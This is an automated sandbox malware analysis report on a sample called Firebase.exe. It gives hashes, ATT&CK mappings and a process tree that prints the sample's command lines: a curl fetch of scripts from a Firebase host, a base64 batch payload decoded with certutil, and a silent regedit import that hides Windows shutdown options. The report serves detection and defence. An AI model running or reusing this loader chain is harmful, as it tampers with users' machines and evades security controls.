100120bd214342195f2605fd330370970095425a5a02dfd8a4f7b389e0ab428c

Analysis

max time kernel
19s
max time network
20s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
27/09/2024, 21:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Firebase.exe
Size

154KB
MD5

90400f8a61086d340fb01e7d5149d49c
SHA1

5e094cf298560e8951c87e9da09a8a6700796838
SHA256

100120bd214342195f2605fd330370970095425a5a02dfd8a4f7b389e0ab428c
SHA512

5760feed7757287c7d7591aad0612e345de8dd6c0861f0707928e7119462d96941fc368fe1110d8501755eb77993414a69a3456f2b4df56cf2dce71a104983fb
SSDEEP

3072:2ahKyd2n3175GWp1icKAArDZz4N9GhbkrNEk1vT:2ahOzp0yN90QEM

Score

6^/10

defense_evasion persistence

Malware Config

Signatures

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	Firebase.exe

Deobfuscate/Decode Files or Information 1 TTPs 1 IoCs

Payload decoded via CertUtil.

defense_evasion

Deobfuscate/Decode Files or Information

T1140

pid	Process
4832	certutil.exe

Runs .reg file with regedit 1 IoCs

pid	Process
1908	regedit.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 3496 wrote to memory of 1168	3496	Firebase.exe	82
PID 3496 wrote to memory of 1168	3496	Firebase.exe	82
PID 1168 wrote to memory of 1088	1168	cmd.exe	84
PID 1168 wrote to memory of 1088	1168	cmd.exe	84
PID 1168 wrote to memory of 1800	1168	cmd.exe	85
PID 1168 wrote to memory of 1800	1168	cmd.exe	85
PID 1168 wrote to memory of 3376	1168	cmd.exe	86
PID 1168 wrote to memory of 3376	1168	cmd.exe	86
PID 1168 wrote to memory of 4832	1168	cmd.exe	87
PID 1168 wrote to memory of 4832	1168	cmd.exe	87
PID 1168 wrote to memory of 1908	1168	cmd.exe	88
PID 1168 wrote to memory of 1908	1168	cmd.exe	88

C:\Users\Admin\AppData\Local\Temp\Firebase.exe
"C:\Users\Admin\AppData\Local\Temp\Firebase.exe"
1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3496
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c "Firebase.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1168
- - C:\Windows\system32\curl.exe
    curl -s "https://scriptsdatabase-4effc-default-rtdb.firebaseio.com/Data.json"
    3⤵
    PID:1088
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo B64#RUN#QGVjaG8gb2ZmCnNldCByZWdmaWxlPUhpZGVTaHV0ZG93bi5yZWcKCigKICAgIGVjaG8gV2luZG93cyBSZWdpc3RyeSBFZGl0b3IgVmVyc2lvbiA1LjAwCiAgICBlY2hvLgogICAgZWNobyA7IEhpZGUgdGhlIFNodXRkb3duLCBSZXN0YXJ0LCBhbmQgU2xlZXAgb3B0aW9ucwogICAgZWNobyBbSEtFWV9MT0NBTF9NQUNISU5FXFNPRlRXQVJFXE1pY3Jvc29mdFxQb2xpY3lNYW5hZ2VyXGRlZmF1bHRcU3RhcnRcSGlkZVNodXREb3duXQogICAgZWNobyAidmFsdWUiPWR3b3JkOjAwMDAwMDAxCiAgICBlY2hvLgogICAgZWNobyBbSEtFWV9MT0NBTF9NQUNISU5FXFNPRlRXQVJFXE1pY3Jvc29mdFxQb2xpY3lNYW5hZ2VyXGRlZmF1bHRcU3RhcnRcSGlkZVJlc3RhcnRdCiAgICBlY2hvICJ2YWx1ZSI9ZHdvcmQ6MDAwMDAwMDEKICAgIGVjaG8uCiAgICBlY2hvIFtIS0VZX0xPQ0FMX01BQ0hJTkVcU09GVFdBUkVcTWljcm9zb2Z0XFBvbGljeU1hbmFnZXJcZGVmYXVsdFxTdGFydFxIaWRlU2xlZXBdCiAgICBlY2hvICJ2YWx1ZSI9ZHdvcmQ6MDAwMDAwMDEKKSA+ICIlcmVnZmlsZSUiCgpyZWdlZGl0IC9zICIlcmVnZmlsZSUiCgpkZWwgIiVyZWdmaWxlJSIK "
    3⤵
    PID:1800
- - C:\Windows\system32\findstr.exe
    findstr /b "B64#RUN#"
    3⤵
    PID:3376
- - C:\Windows\system32\certutil.exe
    certutil -decode encoded.b64 decoded.bat
    3⤵
    - Deobfuscate/Decode Files or Information
    PID:4832
- - C:\Windows\regedit.exe
    regedit /s "HideShutdown.reg"
    3⤵
    - Runs .reg file with regedit
    PID:1908

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Deobfuscate/Decode Files or Information

T1140

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Firebase.bat

Filesize
2KB

MD5
a8ac75242f5f4e0cea3f1e1f32d61f29

SHA1
f6279838cd35263e0d96dc2b5720cff3c44792c6

SHA256
94ea0c470eb5a10a15adfa86c1c444dcd2fff82d20dca37ed5462d3a6156a26b

SHA512
43270edb11237647e87ba31c00b03443d5cbfb431c24569067156ac48dfdaeac81b614ed4f8e5ad9803fc9f2e40a6b2ff9304f2bdabb5acf9cf328942c02447f

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HideShutdown.reg

Filesize
407B

MD5
ba4099bd7ed2d4b20a64a175ceaf8892

SHA1
c81486f544f95276c0ace9bbb5264266ecbf9e3c

SHA256
0fc71e0e5193447cdf77020bf61757bcd5a80e7889e5185c1a71915aa6fe3688

SHA512
5d1c11cdb680703462f4594cb498c6df615d0436440d3c83173f980451ae40e199f6b8f047d8079a2859bb7a646d9b0b8831fff0312ae365ed026d7d5011abad

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\decoded.bat

Filesize
594B

MD5
27f70714bc4710f8604f309d0eccf738

SHA1
c8f9c770a7d8fcfa7fc29c3ff36e530a4c723148

SHA256
5f09a711fbf2469e5849fec0aa0e6a0a95ed1899af7daf2ecfe2ec8bbf502dae

SHA512
cf4e50e2b8e0b45e0146937824b852297d8d48b34498bbfd53190ae4f0b9f0514b0248bb2f46ac3525c6270c39dbbf67af1ccd17a28aaa13ea45de74110bea81

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\encoded.b64

Filesize
794B

MD5
d70eaab3e1d8a7a15091039df76af539

SHA1
fa61ade14f1cb0c331d987b0640966b4af62d55d

SHA256
0c5fef1a855c2c350f8a6771302dfba9f1ccd9492c5651f436902a340e2f579c

SHA512
e430b44e266ca2bfee2d6b47d2627a2208053d4f1b07384a3528d82839467758db5f631e27be680b40b722153961ea4bda97ea8a2ec168cefe71f434df37c36b

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads